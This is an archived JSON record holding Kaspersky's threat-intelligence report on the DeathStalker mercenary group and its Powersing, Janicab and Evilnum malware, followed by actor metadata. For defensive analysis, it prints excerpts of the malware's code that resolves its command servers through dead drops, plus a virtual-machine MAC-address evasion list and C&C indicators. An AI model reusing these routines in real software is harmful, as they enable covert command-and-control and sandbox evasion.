{ "id": "4f521747-ac82-4982-bebe-0255b38dfa82", "created_at": "2026-04-06T00:09:33.443193Z", "updated_at": "2026-04-10T13:11:18.711188Z", "deleted_at": null, "sha1_hash": "570b18f11507f076c46b8428c1ebcb9dbe685bf9", "title": "Lifting the veil on DeathStalker, a mercenary triumvirate", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 609268, "plain_text": "Lifting the veil on DeathStalker, a mercenary triumvirate\r\nBy Ivan Kwiatkowski\r\nPublished: 2020-08-24 · Archived: 2026-04-05 15:58:24 UTC\r\nState-sponsored threat actors and sophisticated attacks are often in the spotlight. Indeed, their innovative\r\ntechniques, advanced malware platforms and 0-day exploit chains capture our collective imagination. Yet these\r\ngroups still aren’t likely to be a part of the risk model at most companies, nor should they be. Businesses today are\r\nfaced with an array of much more immediate threats, from ransomware and customer information leaks, to\r\ncompetitors engaging in unethical business practices. In this blog post, we’ll be focusing on DeathStalker: a\r\nunique threat group that appears to target law firms and companies in the financial sector (although we’ve\r\noccasionally seen them in other verticals as well). As far as we can tell, this actor isn’t motivated by financial gain.\r\nThey don’t deploy ransomware, steal payment information to resell it, or engage in any type of activity commonly\r\nassociated with the cybercrime underworld. Their interest in gathering sensitive business information leads us to\r\nbelieve that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as some sort of\r\ninformation broker in financial circles.\r\nDeathStalker first came to our attention through a PowerShell-based implant called Powersing. By unraveling this\r\nthread, we were able to identify activities dating back to 2018, and possibly even 2012. But before we dive into a\r\nhistory of DeathStalker and possible links to known groups, we’ll start with a bit of background, beginning with\r\nthis actor’s current arsenal.\r\nOverview\r\nRecent operations we attribute to this threat actor rely on the same intrusion vector: spear-phishing emails with\r\nattached archives containing a malicious LNK file.\r\nDespite looking like documents from the Explorer or popular archive-extraction products, the shortcuts lead to\r\ncmd.exe. These shortcut files have the following structure:\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 1 of 12\n\nClicking them initiates a convoluted sequence resulting in the execution of arbitrary code on the victim’s machine.\r\nA short PowerShell script, passed through cmd.exe’s arguments, bootstraps the following chain:\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 2 of 12\n\nStage 0’s role is to extract and execute the next element of the chain, as well as a decoy document\r\nembedded inside the LNK file to display to the user. This creates the illusion of having clicked on a real\r\ndocument and ensures the victim doesn’t get suspicious.\r\nStage 1 is a PowerShell script containing C# assembly designed to connect to a dead drop resolver (more\r\non this in the next paragraph) and obtain cryptographic material used to decode the last stage of the chain\r\nby extracting a “DLL” file from the shortcut and locating a Base64-encoded list of URLs at a fixed offset.\r\nThis establishes persistence by creating a shortcut (using the dropped icon) in the Windows startup folder\r\npointing to the VBE startup script.\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 3 of 12\n\nFinally, on stage 2, the actual malware implant used to take control of the victim’s machine. It connects to\r\none of the dead drop resolvers to get the address of the real C\u0026C server and enters a loop that looks for\r\norders every few seconds.\r\nUpon system restart, the VBE startup script – which closely resembles stage 0 – is automatically executed,\r\nonce again leading all the way to Powersing stage 2.\r\nCommunications with the C\u0026C server involve the exchange of JSON-encoded objects. Powersing only has two\r\ntasks:\r\nCapture periodic screenshots from the victim’s machine, which are immediately sent to the C\u0026C server\r\n(two built-in commands allow operators to change screenshot quality and periodicity)\r\nExecute arbitrary Powershell scripts provided by the C\u0026C\r\nOn stages 1 and 2, security software evasion is carried out with a high degree of variation across the different\r\nsamples we’ve analyzed. Depending on the AV detected on the machine, Powersing may opt for alternative\r\npersistence methods, or even stop running entirely. We suspect that the group behind this toolset performs\r\ndetection tests before each of their campaigns and updates their scripts based on the results. This indicates an\r\niterative and fast-paced approach to software design. It’s worth pointing out that stage 2 actively looks for traces\r\nof virtualization (for example, vendor specific MAC addresses) and malware analysis tools on the machine, and\r\nreports this information to the C\u0026C server.\r\nTo wrap up this section, we’d like to mention that Powersing isn’t a monolithic malware platform. Instead, it’s a\r\nstealthy foothold inside the victim’s network with its key role to enable the projection of further tools.\r\nDead drop resolvers\r\nThe DeathStalkers toolchain leverages a number of public services as dead drop resolvers. These services provide\r\na way for attackers to store data at a fixed URL through public posts, comments, user profiles, content\r\ndescriptions, etc. Messages left by the attackers follow the following patterns: “My keyboard doesn’t work…\r\n[string].” and “Yo bro I sing [Base64 encoded string] yeah”.\r\nDuring our investigation of this threat actor, we discovered such messages on:\r\nGoogle+\r\nImgur\r\nReddit\r\nShockChan\r\nTumblr\r\nTwitter\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 4 of 12\n\nYouTube\r\nWordPress\r\nIn all likelihood, this list isn’t exhaustive. A number of these messages can be discovered through simple Google\r\nqueries. Powersing’s first order of business is to connect to any dead drop resolver it knows to retrieve this\r\ninformation. Stage 1 consumes the first string of these messages, which contains the AES key used to decode\r\nstage 2. Then stage 2 connects to the dead drop resolver to obtain the integer encoded in the second string. As the\r\ncode excerpt below shows, this integer is divided by an arbitrary constant (which varies depending on the sample)\r\nbefore being converted to an IP address:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\npublic string LongToIP(string long_ip_string)\r\n{\r\n  long longIP;\r\n  long.TryParse(long_ip_string, out longIP);\r\n  longIP = longIP / 25835;  // NB: divide integer by an arbitrary constant\r\n  string ip = string.Empty;\r\n  for (int i = 0; i \u003c 4; i++)\r\n  {\r\n    int num = (int)(longIP / Math.Pow(256, (3 - i)));\r\n    longIP = longIP - (long)(num * Math.Pow(256, (3 - i)));\r\n    if (i == 0)\r\n      ip = num.ToString();\r\n    else\r\n      ip = ip + \".\" + num.ToString();\r\n  }\r\n  return ip;\r\n}\r\nThis IP address is then stored on the user’s hard drive and used to establish a connection to the real C\u0026C server\r\nused by the operators to control Powersing. Relying on well-known public services allows cybercriminals to blend\r\ninitial backdoor communications into legitimate network traffic. It also limits what defenders can do to hinder\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 5 of 12\n\ntheir operations, as these platforms can’t generally be blocklisted at the company level, and getting content taken\r\ndown from them can be a difficult and lengthy process. However, this comes at a price: the internet never forgets,\r\nand it’s also difficult for cybercriminals to remove traces of their operations. Thanks to the data indexed or\r\narchived by search engines, we estimate that Powersing was first used around August 2017.\r\nA final detail we’d like to mention is that a number of Powersing C\u0026Cs we discovered had SSL certificates\r\nreminiscent of Sofacy’s infamous Chopstick C\u0026C “IT Department” certificates. We’re confident this\r\ninfrastructure isn’t linked with Sofacy and believe this is an attempt by the threat actor to lead defenders to\r\nerroneous conclusions.\r\nDeathStalker links to known groups\r\nJanicab\r\nSec0wn’s original blog post introducing Powersing hinted at possible links with a malware family called Janicab,\r\nwhose older samples date back to 2012. However, to the best of our knowledge, this connection was never\r\nexplored publicly. Ultimately, we obtained one of the malware samples listed by F-Secure in a 2015 blog post\r\n(1fe4c500c9f0f7630a6037e2de6580e9) on Janicab to look for similarities.\r\nThis file is another LNK pointing to cmd.exe that drops a VBE script on the system when clicked, as well as a\r\ndecoy document. The script establishes a connection to an unlisted YouTube video to obtain C\u0026C information\r\nembedded in the description:\r\nThe integer obtained on this page is then divided by a constant before being converted to an IP address:\r\nSet objRE = New RegExp\r\nWith objRE\r\n.Pattern = \"our (.*)th psy anniversary\"\r\n.IgnoreCase = True\r\nEnd With\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 6 of 12\n\nSet objMatch = objRE.Execute( outputHTML )\r\nIf objMatch.Count = 1 Then\r\nserver = \"\"\r\nserver = objMatch.Item(0).Submatches(0)\r\nserver = server / 31337  'NB: divide integer by an arbitrary constant\r\n'msgbox(server)\r\nserver = IPConvert(server)\r\nserver = \"http://\" \u0026 server \u0026 \"/wp-admin-content\"\r\nEnd If\r\nWhile the use of YouTube as a dead drop resolver alone wouldn’t be sufficient to establish a link between the two\r\ngroups, we feel that the process of obtaining an integer somewhere online and dividing it before interpreting it as\r\nan IP address is unique enough to draw a first connection.\r\nJanicab’s features also remind us of Powersing’s: the sample contains VM detection based on the MAC address of\r\nthe machine, looks for malware analysis programs and has familiar antivirus software evasion routines. Janicab\r\nalso periodically sends screenshot captures of the victim’s desktop to the C\u0026C and appears to enable the execution\r\nof arbitrary Python scripts.\r\nMore recent versions of Janicab (85ed6ab8f60087e80ab3ff87c15b1174) also involve network traffic reminiscent\r\nof Powersing, especially when the malware registers with its C\u0026C server:\r\nPowersing registration\r\nrequest (POST data)\r\nJanicab registration request\r\n{\r\n“un”: “[username]”,\r\n“cn”: “[computer name]”,\r\n“av”: “[installed AV\r\nprogram]”,\r\n“dob”: “[OS installation\r\ndate]”,\r\n“os”: “[OS version]”,\r\n“ou”: “[campaign\r\nidentifier]”,\r\n“dc”: “[version]”\r\n}\r\nGET /gid.php?action=add\u0026cn=[computer name]\u0026un=[username]\u0026v=\r\n[version]\u0026av=[installed AV program]\u0026an=[campaign identifier]\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 7 of 12\n\nIn addition, this sample contains the exact same list of denylisted VM MAC addresses as the Powersing sample\r\nintroduced earlier in this post, in the same order.\r\nPowersing’s denylisted MAC addresses Janicab’s denylisted MAC addresses\r\nvirtual_mac_prefix.Add(“00015D”); macs(0) = “00-01-5D”\r\nvirtual_mac_prefix.Add(“0003BA”); macs(1) = “00-03-BA”\r\nvirtual_mac_prefix.Add(“000782”); macs(2) = “00-07-82”\r\nvirtual_mac_prefix.Add(“000F4B”); macs(3) = “00-0F-4B”\r\nvirtual_mac_prefix.Add(“00104F”); macs(4) = “00-10-4F”\r\nvirtual_mac_prefix.Add(“0010E0”); macs(5) = “00-10-E0”\r\nvirtual_mac_prefix.Add(“00144F”); macs(6) = “00-14-4F”\r\nvirtual_mac_prefix.Add(“0020F2”); macs(7) = “00-20-F2”\r\nvirtual_mac_prefix.Add(“002128”); macs(8) = “00-21-28”\r\nvirtual_mac_prefix.Add(“0021F6”); macs(9) = “00-21-F6”\r\nvirtual_mac_prefix.Add(“005056”); macs(10) = “00-50-56”\r\nvirtual_mac_prefix.Add(“000C29”); macs(11) = “00-0C-29”\r\nvirtual_mac_prefix.Add(“000569”); macs(12) = “00-05-69”\r\nvirtual_mac_prefix.Add(“0003FF”); macs(13) = “00-03-FF”\r\nvirtual_mac_prefix.Add(“001C42”); macs(14) = “00-1C-42”\r\nvirtual_mac_prefix.Add(“00163E”); macs(15) = “00-16-3E”\r\nvirtual_mac_prefix.Add(“080027”); macs(16) = “08-00-27”\r\nvirtual_mac_prefix.Add(“001C14”); macs(17) = “00-1C-14”\r\nvirtual_mac_prefix.Add(“080020”); macs(18) = “08-00-20”\r\nvirtual_mac_prefix.Add(“000D3A”); macs(19) = “00-0D-3A”\r\nvirtual_mac_prefix.Add(“00125A”); macs(20) = “00-12-5A”\r\nvirtual_mac_prefix.Add(“00155D”); macs(21) = “00-15-5D”\r\nvirtual_mac_prefix.Add(“0017FA”); macs(22) = “00-17-FA”\r\nvirtual_mac_prefix.Add(“001DD8”); macs(23) = “00-1D-D8”\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 8 of 12\n\nvirtual_mac_prefix.Add(“002248”); macs(24) = “00-22-48”\r\nvirtual_mac_prefix.Add(“0025AE”); macs(25) = “00-25-AE”\r\nvirtual_mac_prefix.Add(“0050C2”); macs(26) = “00-50-C2”\r\nvirtual_mac_prefix.Add(“0050F2”); macs(27) = “00-50-F2”\r\nvirtual_mac_prefix.Add(“444553”); macs(28) = “44-45-53”\r\nvirtual_mac_prefix.Add(“7CED8D”); macs(29) = “7C-ED-8D”\r\nEvilnum\r\nAnother possible connection worth investigating concerns the more recent Evilnum malware family, which was\r\nthe subject of an in-depth blog post from ESET last July, as well as a couple of our own private reports. ESET’s\r\npost details another LNK-based infection chain leading to the execution of Javascript-based malware. Again, we\r\nobtained an old Evilnum sample (219dedb53da6b1dce0d6c071af59b45c) and observed that it also obtained C\u0026C\r\ninformation from a dead drop resolver (GitHub) to obtain an IP address converted with the following code:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\nfunction extract_srvaddr() {\r\n  serverFound = false;\r\n  pattern = 'our news start at (.*) thank you';\r\n  while(serverFound == false) {\r\n    var item = items[Math.floor(Math.random()*items.length)];\r\n    var html = get_page_content_with_ie(item,'');\r\n    if(html != '') {\r\n      var match = extract_string(pattern, html);\r\n      if(match != null) {\r\n      srv = num2dot(match[1]/666); // NB: divide integer by a constant\r\n      srv = srv + \"/Validate\";\r\n      srv_stat = get_page_content_with_ie(srv+\"/ValSrv\", '');\r\n      validate_str = extract_string('youwillnotfindthisanywhare', srv_stat);\r\n      if(validate_str == 'youwillnotfindthisanywhare') {\r\n        serverFound = true;\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 9 of 12\n\n16\r\n17\r\n18\r\n19\r\n20\r\n        return srv;\r\n      }\r\n    }\r\n  }\r\n}\r\nWe can’t help but notice the pattern of looking for a specific string using a regular expression to obtain an integer,\r\nthen dividing this integer by a constant resulting in the IP address of the C\u0026C server. While Evilnum provides\r\nmore capabilities than Powersing, it can also capture screenshots and send them to the C\u0026C server.\r\nIn terms of victimology, Evilnum focuses on companies in the Fintech sector. It appears to be more interested in\r\nbusiness intelligence than financial gain. This is consistent with the DeathStalker activity we’ve observed thus far.\r\nOne final connection we want to mention is that recent Evilnum (835d94b0490831da27d9bf4e9f4b429c) and\r\nJanicab samples have some slight code overlaps, despite being written in different languages:\r\nVariables with similar names (“ieWatchdogFilename” for Janicab, “ieWatchdogPath” for Evilnum) used in\r\nfunctions performing equivalent tasks\r\nTwo functions used for cleanup have identical names: “deleteLeftOvers”\r\nWe feel that these names are unique enough to create an additional link between the two malware families. Less\r\nconclusively, this Evilnum sample also contains a function called “long2ip” to convert integers to IP addresses,\r\nwhile Powersing contains a similar implementation under the “LongToIP” name.\r\nSummary\r\nPowersing, Janicab and Evilnum are three scripting language-based toolchains exhibiting the following\r\nsimilarities:\r\nAll three are distributed through LNK files contained in archives delivered through spear-phishing\r\nThey obtain C\u0026C information from dead drop resolvers using regular expressions and hardcoded sentences\r\nIP addresses are obtained in the form of integers that are then divided by a hardcoded constant before being\r\nconverted\r\nMinor code overlaps between the three malware families could indicate that they’ve been developed by the\r\nsame team, or inside a group that shares software development practices\r\nThe three malware families all have screenshot capture capabilities. While not original in itself, this isn’t\r\nusually part of the development priorities of such groups and could be indicative of a shared design\r\nspecification\r\nFinally, while we don’t have a lot of information about Janicab’s victimology, Powersing and Evilnum both\r\ngo after business intelligence, albeit in different industry verticals. Both sets of activities are consistent\r\nwith the hypothesis that they’re run by a mercenary outfit\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 10 of 12\n\nWhile none of these points on their own are sufficient in our eyes to draw a conclusion, we feel that together they\r\nallow us to assess with medium confidence that Powersing, Evilnum and Janicab are operated by the same\r\ngroup. Additional data shared with us by industry partners that we can’t disclose at the moment also supports this\r\nconclusion.\r\nVictimology\r\nDeathStalker primarily targets private entities in the financial sector, including law offices, wealth consultancy\r\nfirms, financial technology companies, and so on. In one unique instance, we also observed DeathStalker\r\nattacking a diplomatic entity.\r\nWe’ve been able to identify Powersing-related activities in Argentina, China, Cyprus, Israel, Lebanon,\r\nSwitzerland, Taiwan, Turkey, the United Kingdom and the United Arab Emirates. We also located Evilnum\r\nvictims in Cyprus, India, Lebanon, Russia, Jordan and the United Arab Emirates.\r\nHowever, we believe that DeathStalkers chooses its targets purely based on their perceived value, or perhaps\r\nfollowing customer requests. In this context, we assess that any company in the financial sector could catch\r\nDeathStalker’s attention, no matter its geographic location.\r\nConclusion\r\nIn this blog post, we described a modern infection chain that’s still actively used and developed by a threat actor\r\ntoday. It doesn’t contain any innovative tricks or sophisticated methods, and certain components of the chain may\r\nactually appear needlessly convoluted. Yet if the hypothesis is correct that the same group operates Janicab and\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 11 of 12\n\nPowersing, it indicates that they’ve been leveraging the same methodologies since 2012. In the infosec world, it\r\ndoesn’t get more “tried and true” than this.\r\nBased on the limited technological means either of these toolchains display, we believe they’re good examples of\r\nwhat small groups or even skilled individuals can create. The value we see in publicly releasing information about\r\nDeathStalker is to have this threat actor serve as a baseline of what the private sector should be able to defend\r\nagainst. Groups like DeathStalker represent the type of cyberthreat most companies today are likely to face more\r\nthan state-sponsored APTs. Due to its ongoing operations (DeathStalker notably leveraged COVID-19 for both\r\nJanicab and Powersing implant deployment since March 2020) and continuous activity since 2018, we believe that\r\nDeathStalker is still developing its toolset, and that we’ll have more to report on in the near future.\r\nWe advise defenders to pay close attention to any process creation related to native Windows interpreters for\r\nscripting languages, such as powershell.exe and cscript.exe. Wherever possible, these utilities should be made\r\nunavailable. We also recommend that future awareness trainings and security product assessments include\r\ninfection chains based on LNK files.\r\nFor more information about both DeathStalker and Evilnum activity, subscribe to our private reporting services:\r\nintelreports@kaspersky.com\r\nIndicators of Compromise\r\nC\u0026C servers\r\n54.38.192.174 Powersing C\u0026C\r\n91.229.76.17 Powersing C\u0026C\r\n91.229.76.153 Powersing C\u0026C\r\n91.229.77.240 Powersing C\u0026C\r\n91.229.77.120 Powersing C\u0026C\r\n91.229.79.120 Powersing C\u0026C\r\n54.38.192.174 Powersing C\u0026C\r\n105.104.10.115 Powersing C\u0026C\r\nSource: https://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://securelist.com/deathstalker-mercenary-triumvirate/98177/" ], "report_names": [ "98177" ], "threat_actors": [ { "id": "059b16f8-d4e0-4399-9add-18101a2fd298", "created_at": "2022-10-25T15:50:23.29434Z", "updated_at": "2026-04-10T02:00:05.380938Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "Evilnum" ], "source_name": "MITRE:Evilnum", "tools": [ "More_eggs", "EVILNUM", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "f7aa6029-2b01-4eee-8fe6-287330e087c9", "created_at": "2022-10-25T16:07:23.536763Z", "updated_at": "2026-04-10T02:00:04.646542Z", "deleted_at": null, "main_name": "Deceptikons", "aliases": [ "DeathStalker", "Deceptikons" ], "source_name": "ETDA:Deceptikons", "tools": [ "EVILNUM", "Evilnum", "Janicab", "PowerPepper", "Powersing", "VileRAT" ], "source_id": "ETDA", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "dfee8b2e-d6b9-4143-a0d9-ca39396dd3bf", "created_at": "2022-10-25T16:07:24.467088Z", "updated_at": "2026-04-10T02:00:05.000485Z", "deleted_at": null, "main_name": "Circles", "aliases": [], "source_name": "ETDA:Circles", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd", "created_at": "2023-01-06T13:46:39.153487Z", "updated_at": "2026-04-10T02:00:03.232006Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "EvilNum", "Jointworm", "KNOCKOUT SPIDER", "DeathStalker", "TA4563" ], "source_name": "MISPGALAXY:Evilnum", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "39ea99fb-1704-445d-b5cd-81e7c99d6012", "created_at": "2022-10-25T16:07:23.601894Z", "updated_at": "2026-04-10T02:00:04.684134Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "G0120", "Jointworm", "Operation Phantom in the [Command] Shell", "TA4563" ], "source_name": "ETDA:Evilnum", "tools": [ "Bypass-UAC", "Cardinal RAT", "ChromeCookiesView", "EVILNUM", "Evilnum", "IronPython", "LaZagne", "MailPassView", "More_eggs", "ProduKey", "PyVil", "PyVil RAT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraPreter", "TerraStealer", "TerraTV" ], "source_id": "ETDA", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434173, "ts_updated_at": 1775826678, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/570b18f11507f076c46b8428c1ebcb9dbe685bf9.pdf", "text": "https://archive.orkl.eu/570b18f11507f076c46b8428c1ebcb9dbe685bf9.txt", "img": "https://archive.orkl.eu/570b18f11507f076c46b8428c1ebcb9dbe685bf9.jpg" } }